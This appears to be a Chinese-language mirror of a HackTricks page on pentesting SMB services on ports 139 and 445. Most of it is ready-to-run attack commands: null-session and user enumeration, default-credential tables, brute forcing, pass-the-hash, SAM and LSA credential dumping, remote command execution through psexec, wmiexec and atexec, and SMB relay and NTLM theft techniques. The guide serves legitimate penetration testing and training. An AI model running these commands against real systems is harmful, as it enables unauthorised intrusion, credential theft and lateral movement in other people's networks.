mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 13:13:41 +00:00
586 lines
27 KiB
Markdown
586 lines
27 KiB
Markdown
# 139,445 - SMB渗透测试
|
||
|
||
<details>
|
||
|
||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||
|
||
支持HackTricks的其他方式:
|
||
|
||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||
|
||
</details>
|
||
|
||
## **端口139**
|
||
|
||
**_网络基本输入输出系统_(NetBIOS)**是一种软件协议,旨在使局域网(LAN)中的应用程序、个人电脑和台式机能够与网络硬件进行交互,**促进数据在网络中的传输**。在NetBIOS网络上,通过它们的NetBIOS名称来识别和定位运行的软件应用程序,这些名称最多可以有16个字符,并且通常与计算机名称不同。两个应用程序之间的NetBIOS会话是通过一个应用程序(作为客户端)向另一个应用程序(作为服务器)发出“呼叫”命令来启动的,使用**TCP端口139**。
|
||
```
|
||
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|
||
```
|
||
## 端口445
|
||
|
||
从技术上讲,端口139被称为“NBT over IP”,而端口445被标识为“SMB over IP”。缩写**SMB**代表“**Server Message Blocks**”,也被现代称为**Common Internet File System (CIFS)**。作为一个应用层网络协议,SMB/CIFS主要用于实现文件、打印机、串行端口的共享访问,并促进网络中节点之间各种形式的通信。
|
||
|
||
例如,在Windows环境中,突出显示SMB可以直接通过TCP/IP运行,消除了对NetBIOS over TCP/IP的必要性,通过利用端口445。相反,在不同系统上,观察到使用端口139,表明SMB与NetBIOS over TCP/IP一起执行。
|
||
```
|
||
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
|
||
```
|
||
### SMB
|
||
|
||
**Server Message Block (SMB)**协议以**客户端-服务器**模型运行,旨在规范对文件、目录和其他网络资源(如打印机和路由器)的访问。SMB主要用于**Windows**操作系统系列,确保向后兼容性,使具有较新版本Microsoft操作系统的设备能够与运行较旧版本的设备无缝交互。此外,**Samba**项目提供了一个免费软件解决方案,使SMB能够在**Linux**和Unix系统上实现,从而通过SMB促进跨平台通信。
|
||
|
||
共享代表**本地文件系统的任意部分**,可以由SMB服务器提供,使得部分客户端可以看到层次结构,**与服务器的实际结构部分独立**。**访问控制列表(ACLs)**定义了**访问权限**,允许对用户权限进行**细粒度控制**,包括**`执行`**、**`读取`**和**`完全访问`**等属性。这些权限可以分配给个别用户或组,基于共享,与服务器上设置的本地权限不同。
|
||
|
||
### IPC$ 共享
|
||
|
||
通过匿名空会话,可以访问IPC$共享,从而与通过命名管道公开的服务进行交互。工具`enum4linux`对此很有用。正确使用它,可以获取:
|
||
|
||
- 操作系统信息
|
||
- 父域的详细信息
|
||
- 本地用户和组的汇编
|
||
- 可用SMB共享的信息
|
||
- 有效的系统安全策略
|
||
|
||
这个功能对于网络管理员和安全专业人员来评估网络上SMB(Server Message Block)服务的安全状况至关重要。`enum4linux`提供了目标系统SMB环境的全面视图,这对于识别潜在漏洞并确保SMB服务得到适当保护至关重要。
|
||
```bash
|
||
enum4linux -a target_ip
|
||
```
|
||
上述命令是`enum4linux`如何用于针对`target_ip`指定的目标执行完整枚举的示例。
|
||
|
||
## 什么是NTLM
|
||
|
||
如果你不知道什么是NTLM,或者想了解它是如何工作以及如何滥用它,你会发现这个关于**NTLM**的页面非常有趣,其中解释了**这个协议的工作原理以及如何利用它**:
|
||
|
||
{% content-ref url="../windows-hardening/ntlm/" %}
|
||
[ntlm](../windows-hardening/ntlm/)
|
||
{% endcontent-ref %}
|
||
|
||
## **服务器枚举**
|
||
|
||
### **扫描**网络以搜索主机:
|
||
```bash
|
||
nbtscan -r 192.168.0.1/24
|
||
```
|
||
### SMB 服务器版本
|
||
|
||
要寻找 SMB 版本的可能漏洞,重要的是要知道正在使用的版本。如果这些信息在其他使用的工具中没有出现,您可以:
|
||
|
||
- 使用 **MSF** 辅助模块 \_**auxiliary/scanner/smb/smb\_version**
|
||
- 或者使用以下脚本:
|
||
```bash
|
||
#!/bin/sh
|
||
#Author: rewardone
|
||
#Description:
|
||
# Requires root or enough permissions to use tcpdump
|
||
# Will listen for the first 7 packets of a null login
|
||
# and grab the SMB Version
|
||
#Notes:
|
||
# Will sometimes not capture or will print multiple
|
||
# lines. May need to run a second time for success.
|
||
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
|
||
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
|
||
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
|
||
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
|
||
echo "" && sleep .1
|
||
```
|
||
### **搜索漏洞利用**
|
||
```bash
|
||
msf> search type:exploit platform:windows target:2008 smb
|
||
searchsploit microsoft smb
|
||
```
|
||
### **可能的**凭证
|
||
|
||
| **用户名** | **常用密码** |
|
||
| -------------------- | ----------------------------------------- |
|
||
| _(空白)_ | _(空白)_ |
|
||
| guest | _(空白)_ |
|
||
| Administrator, admin | _(空白)_, password, administrator, admin |
|
||
| arcserve | arcserve, backup |
|
||
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
|
||
| backupexec, backup | backupexec, backup, arcada |
|
||
| test, lab, demo | password, test, lab, demo |
|
||
|
||
### 暴力破解
|
||
|
||
* [**SMB暴力破解**](../generic-methodologies-and-resources/brute-force.md#smb)
|
||
|
||
### SMB环境信息
|
||
|
||
### 获取信息
|
||
```bash
|
||
#Dump interesting information
|
||
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
|
||
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
|
||
nmap --script "safe or smb-enum-*" -p 445 <IP>
|
||
|
||
#Connect to the rpc
|
||
rpcclient -U "" -N <IP> #No creds
|
||
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
|
||
rpcclient -U "username%passwd" <IP> #With creds
|
||
#You can use querydispinfo and enumdomusers to query user information
|
||
|
||
#Dump user information
|
||
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
|
||
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
|
||
|
||
#Map possible RPC endpoints
|
||
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
|
||
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
|
||
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
|
||
```
|
||
### 枚举用户、组和已登录用户
|
||
|
||
这些信息应该已经从enum4linux和enum4linux-ng中收集到。
|
||
```bash
|
||
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
|
||
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
|
||
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
|
||
|
||
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
|
||
|
||
rpcclient -U "" -N 10.10.10.10
|
||
enumdomusers
|
||
enumdomgroups
|
||
```
|
||
### 枚举本地用户
|
||
|
||
[Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)
|
||
```bash
|
||
lookupsid.py -no-pass hostname.local
|
||
```
|
||
一句话
|
||
```bash
|
||
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
|
||
```
|
||
### Metasploit - 枚举本地用户
|
||
```bash
|
||
use auxiliary/scanner/smb/smb_lookupsid
|
||
set rhosts hostname.local
|
||
run
|
||
```
|
||
### **枚举 LSARPC 和 SAMR rpcclient**
|
||
|
||
{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %}
|
||
[rpcclient-enumeration.md](pentesting-smb/rpcclient-enumeration.md)
|
||
{% endcontent-ref %}
|
||
|
||
### 从 Linux 进行 GUI 连接
|
||
|
||
#### 在终端中:
|
||
|
||
`xdg-open smb://cascade.htb/`
|
||
|
||
#### 在文件浏览器窗口中(nautilus, thunar, 等)
|
||
|
||
`smb://friendzone.htb/general/`
|
||
|
||
## 共享文件夹枚举
|
||
|
||
### 列出共享文件夹
|
||
|
||
始终建议查看是否可以访问任何内容,如果没有凭据,请尝试使用 **null 凭据/访客用户**。
|
||
```bash
|
||
smbclient --no-pass -L //<IP> # Null user
|
||
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
|
||
|
||
smbmap -H <IP> [-P <PORT>] #Null user
|
||
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
|
||
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
|
||
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
|
||
|
||
crackmapexec smb <IP> -u '' -p '' --shares #Null user
|
||
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
|
||
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
|
||
```
|
||
### **连接/列出共享文件夹**
|
||
```bash
|
||
#Connect using smbclient
|
||
smbclient --no-pass //<IP>/<Folder>
|
||
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
|
||
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
|
||
|
||
#List with smbmap, without folder it list everything
|
||
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
|
||
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
|
||
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
|
||
```
|
||
### **手动枚举Windows共享并连接到它们**
|
||
|
||
可能您被限制显示主机机器的任何共享,当您尝试列出它们时,似乎没有任何共享可供连接。因此,值得尝试手动连接到共享。要手动枚举共享,您可能希望查找类似于NT\_STATUS\_ACCESS\_DENIED和NT\_STATUS\_BAD\_NETWORK\_NAME的响应,当使用有效会话(例如空会话或有效凭据)时。这些可能表明共享是否存在但您无权访问,或者共享根本不存在。
|
||
|
||
Windows目标的常见共享名称包括
|
||
|
||
* C$
|
||
* D$
|
||
* ADMIN$
|
||
* IPC$
|
||
* PRINT$
|
||
* FAX$
|
||
* SYSVOL
|
||
* NETLOGON
|
||
|
||
(来自_**网络安全评估第3版**_的常见共享名称)
|
||
|
||
您可以尝试使用以下命令连接到它们
|
||
```bash
|
||
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
|
||
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
|
||
```
|
||
或者使用此脚本(使用空会话)
|
||
```bash
|
||
#/bin/bash
|
||
|
||
ip='<TARGET-IP-HERE>'
|
||
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
|
||
|
||
for share in ${shares[*]}; do
|
||
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
|
||
|
||
if [[ -z $output ]]; then
|
||
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
|
||
else
|
||
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
|
||
fi
|
||
done
|
||
```
|
||
### Examples
|
||
|
||
#### Enumerating SMB Shares
|
||
|
||
To list available SMB shares on a target system, you can use tools like `smbclient` or `smbmap`.
|
||
|
||
```bash
|
||
smbclient -L //<target_ip>
|
||
```
|
||
|
||
```bash
|
||
smbmap -H <target_ip>
|
||
```
|
||
|
||
#### Mounting SMB Shares
|
||
|
||
You can mount an SMB share on your system using the `mount` command.
|
||
|
||
```bash
|
||
sudo mount -t cifs //<target_ip>/<share_name> /mnt/smb -o username=<username>,password=<password>
|
||
```
|
||
|
||
#### Accessing SMB Shares
|
||
|
||
To access an SMB share from the command line, you can use `smbclient`.
|
||
|
||
```bash
|
||
smbclient //<target_ip>/<share_name> -U <username>
|
||
```
|
||
|
||
#### Uploading/Downloading Files
|
||
|
||
You can upload or download files to/from an SMB share using `smbclient`.
|
||
|
||
```bash
|
||
smbclient //<target_ip>/<share_name> -U <username> -c 'put local_file remote_file'
|
||
```
|
||
|
||
```bash
|
||
smbclient //<target_ip>/<share_name> -U <username> -c 'get remote_file local_file'
|
||
```
|
||
```bash
|
||
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
|
||
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
|
||
```
|
||
### **从Windows枚举共享/无需第三方工具**
|
||
|
||
PowerShell
|
||
```powershell
|
||
# Retrieves the SMB shares on the locale computer.
|
||
Get-SmbShare
|
||
Get-WmiObject -Class Win32_Share
|
||
# Retrieves the SMB shares on a remote computer.
|
||
get-smbshare -CimSession "<computer name or session object>"
|
||
# Retrieves the connections established from the local SMB client to the SMB servers.
|
||
Get-SmbConnection
|
||
```
|
||
CMD控制台
|
||
```shell
|
||
# List shares on the local computer
|
||
net share
|
||
# List shares on a remote computer (including hidden ones)
|
||
net view \\<ip> /all
|
||
```
|
||
### MMC Snap-in (图形化)
|
||
|
||
- MMC Snap-in 是一种 Microsoft Management Console (MMC) 的插件,用于管理特定的功能或服务。
|
||
```shell
|
||
# Shared Folders: Shared Folders > Shares
|
||
fsmgmt.msc
|
||
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
|
||
compmgmt.msc
|
||
```
|
||
explorer.exe(图形化),输入 `\\<ip>\` 查看可用的非隐藏共享。
|
||
|
||
### 挂载共享文件夹
|
||
```bash
|
||
mount -t cifs //x.x.x.x/share /mnt/share
|
||
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
|
||
```
|
||
### **下载文件**
|
||
|
||
阅读前面的部分以了解如何使用凭据/Pass-the-Hash 连接。
|
||
```bash
|
||
#Search a file and download
|
||
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
|
||
```
|
||
|
||
```bash
|
||
#Download all
|
||
smbclient //<IP>/<share>
|
||
> mask ""
|
||
> recurse
|
||
> prompt
|
||
> mget *
|
||
#Download everything to current directory
|
||
```
|
||
### 域共享文件夹搜索
|
||
|
||
* [**Snaffler**](https://github.com/SnaffCon/Snaffler)\*\*\*\*
|
||
```bash
|
||
Snaffler.exe -s -d domain.local -o snaffler.log -v data
|
||
```
|
||
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) 蜘蛛。
|
||
* `-M spider_plus [--share <share_name>]`
|
||
* `--pattern txt`
|
||
```bash
|
||
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
|
||
```
|
||
特别有趣的是共享文件中的名为**`Registry.xml`**的文件,因为它们**可能包含**通过组策略配置了**自动登录**的用户的密码。或者**`web.config`**文件,因为它们包含凭据。
|
||
|
||
{% hint style="info" %}
|
||
**SYSVOL共享**可被域中所有经过身份验证的用户**读取**。在其中,您可能会**找到**许多不同的批处理、VBScript和PowerShell**脚本**。\
|
||
您应该**检查**其中的**脚本**,因为您可能会**找到**诸如**密码**之类的敏感信息。
|
||
{% endhint %}
|
||
|
||
## 读取注册表
|
||
|
||
您可以尝试使用一些发现的凭据**读取注册表**。Impacket **`reg.py`**允许您尝试:
|
||
```bash
|
||
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
|
||
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
|
||
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
|
||
```
|
||
## 后渗透
|
||
|
||
**Samba** 服务器的默认配置通常位于 `/etc/samba/smb.conf`,可能包含一些危险的配置:
|
||
|
||
| **设置** | **描述** |
|
||
| ------------------------- | -------------------------------------------------------------- |
|
||
| `browseable = yes` | 允许列出当前共享中可用的共享? |
|
||
| `read only = no` | 禁止创建和修改文件? |
|
||
| `writable = yes` | 允许用户创建和修改文件? |
|
||
| `guest ok = yes` | 允许无需密码连接到服务? |
|
||
| `enable privileges = yes` | 尊重分配给特定 SID 的权限? |
|
||
| `create mask = 0777` | 新创建文件必须分配的权限是什么? |
|
||
| `directory mask = 0777` | 新创建目录必须分配的权限是什么? |
|
||
| `logon script = script.sh`| 用户登录时需要执行的脚本是什么? |
|
||
| `magic script = script.sh`| 当脚本关闭时应执行哪个脚本? |
|
||
| `magic output = script.out`| 魔术脚本的输出需要存储在哪里? |
|
||
|
||
命令 `smbstatus` 提供有关服务器和连接用户的信息。
|
||
|
||
## 使用 Kerberos 进行身份验证
|
||
|
||
您可以使用工具 **smbclient** 和 **rpcclient** 对 **Kerberos** 进行身份验证:
|
||
```bash
|
||
smbclient --kerberos //ws01win10.domain.com/C$
|
||
rpcclient -k ws01win10.domain.com
|
||
```
|
||
## **执行命令**
|
||
|
||
### **crackmapexec**
|
||
|
||
crackmapexec可以利用**mmcexec, smbexec, atexec, wmiexec**中的任何一个来执行命令,其中**wmiexec**是默认方法。您可以使用参数`--exec-method`指定要使用的选项:
|
||
```bash
|
||
apt-get install crackmapexec
|
||
|
||
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
|
||
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
|
||
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
|
||
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
|
||
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
|
||
|
||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
|
||
```
|
||
### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)
|
||
|
||
这两个选项都会在受害者机器上**创建一个新服务**(通过 SMB 使用 _\pipe\svcctl_),并使用它来**执行某些操作**(**psexec** 将**上传**一个可执行文件到 ADMIN$ 共享,而 **smbexec** 将指向 **cmd.exe/powershell.exe** 并将负载放入参数中 --**无文件技术-**-)。\
|
||
有关 [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)和 [**smbexec**](../windows-hardening/ntlm/smbexec.md)的**更多信息**。\
|
||
在 **kali** 上的位置为 /usr/share/doc/python3-impacket/examples/
|
||
```bash
|
||
#If no password is provided, it will be prompted
|
||
./psexec.py [[domain/]username[:password]@]<targetName or address>
|
||
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
|
||
psexec \\192.168.122.66 -u Administrator -p 123456Ww
|
||
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
|
||
```
|
||
使用**参数**`-k`,您可以针对**kerberos**进行身份验证,而不是**NTLM**
|
||
|
||
### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec
|
||
|
||
通过**端口135**使用DCOM执行命令shell,而不触及磁盘或运行新服务。\
|
||
在**kali**中,它位于/usr/share/doc/python3-impacket/examples/
|
||
```bash
|
||
#If no password is provided, it will be prompted
|
||
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
|
||
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
|
||
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
|
||
```
|
||
使用**参数**`-k`,您可以针对**kerberos**进行身份验证,而不是**NTLM**。
|
||
```bash
|
||
#If no password is provided, it will be prompted
|
||
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
|
||
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
|
||
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
|
||
```
|
||
### [AtExec](../windows-hardening/ntlm/atexec.md)
|
||
|
||
通过任务计划程序执行命令(使用 SMB 上的 _\pipe\atsvc_)。\
|
||
在 **kali** 上的路径为 /usr/share/doc/python3-impacket/examples/
|
||
```bash
|
||
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
|
||
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
|
||
```
|
||
## Impacket 参考
|
||
|
||
[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)
|
||
|
||
## **暴力破解用户凭证**
|
||
|
||
**这不是推荐的做法,如果尝试次数超过最大允许次数,可能会导致账户被封锁**
|
||
```bash
|
||
nmap --script smb-brute -p 445 <IP>
|
||
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
|
||
```
|
||
## SMB中继攻击
|
||
|
||
该攻击利用Responder工具在内部网络上**捕获SMB身份验证会话**,并将其**中继**到**目标机器**。如果身份验证**会话成功**,将自动进入**系统** **shell**。\
|
||
[**有关此攻击的更多信息,请单击此处。**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
|
||
|
||
## SMB-Trap
|
||
|
||
Windows库URLMon.dll在页面尝试通过SMB访问某些内容时会自动尝试对主机进行身份验证,例如:`img src="\\10.10.10.10\path\image.jpg"`
|
||
|
||
这发生在以下功能中:
|
||
|
||
* URLDownloadToFile
|
||
* URLDownloadToCache
|
||
* URLOpenStream
|
||
* URLOpenBlockingStream
|
||
|
||
这些功能被一些浏览器和工具(如Skype)使用
|
||
|
||
![来源:http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)
|
||
|
||
### 使用MitMf的SMBTrap
|
||
|
||
![来源:http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)
|
||
|
||
## NTLM窃取
|
||
|
||
类似于SMB陷阱,通过在目标系统上植入恶意文件(通过SMB,例如)可以引发SMB身份验证尝试,从而允许使用工具(如Responder)拦截NetNTLMv2哈希。然后可以离线破解哈希或在[SMB中继攻击](pentesting-smb.md#smb-relay-attack)中使用。
|
||
|
||
[查看:ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
|
||
|
||
## HackTricks自动命令
|
||
```
|
||
Protocol_Name: SMB #Protocol Abbreviation if there is one.
|
||
Port_Number: 137,138,139 #Comma separated if there is more than one.
|
||
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
|
||
|
||
Entry_1:
|
||
Name: Notes
|
||
Description: Notes for SMB
|
||
Note: |
|
||
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
|
||
|
||
#These are the commands I run in order every time I see an open SMB port
|
||
|
||
With No Creds
|
||
nbtscan {IP}
|
||
smbmap -H {IP}
|
||
smbmap -H {IP} -u null -p null
|
||
smbmap -H {IP} -u guest
|
||
smbclient -N -L //{IP}
|
||
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
|
||
rpcclient {IP}
|
||
rpcclient -U "" {IP}
|
||
crackmapexec smb {IP}
|
||
crackmapexec smb {IP} --pass-pol -u "" -p ""
|
||
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
|
||
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
|
||
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
|
||
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
|
||
getArch.py -target {IP}
|
||
|
||
With Creds
|
||
smbmap -H {IP} -u {Username} -p {Password}
|
||
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
|
||
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
|
||
crackmapexec smb {IP} -u {Username} -p {Password} --shares
|
||
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
|
||
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
|
||
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
|
||
|
||
https://book.hacktricks.xyz/pentesting/pentesting-smb
|
||
|
||
Entry_2:
|
||
Name: Enum4Linux
|
||
Description: General SMB Scan
|
||
Command: enum4linux -a {IP}
|
||
|
||
Entry_3:
|
||
Name: Nmap SMB Scan 1
|
||
Description: SMB Vuln Scan With Nmap
|
||
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
|
||
|
||
Entry_4:
|
||
Name: Nmap Smb Scan 2
|
||
Description: SMB Vuln Scan With Nmap (Less Specific)
|
||
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
|
||
|
||
Entry_5:
|
||
Name: Hydra Brute Force
|
||
Description: Need User
|
||
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
|
||
|
||
Entry_6:
|
||
Name: SMB/SMB2 139/445 consolesless mfs enumeration
|
||
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
|
||
Note: sourced from https://github.com/carlospolop/legion
|
||
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
|
||
|
||
```
|
||
<details>
|
||
|
||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
其他支持HackTricks的方式:
|
||
|
||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||
|
||
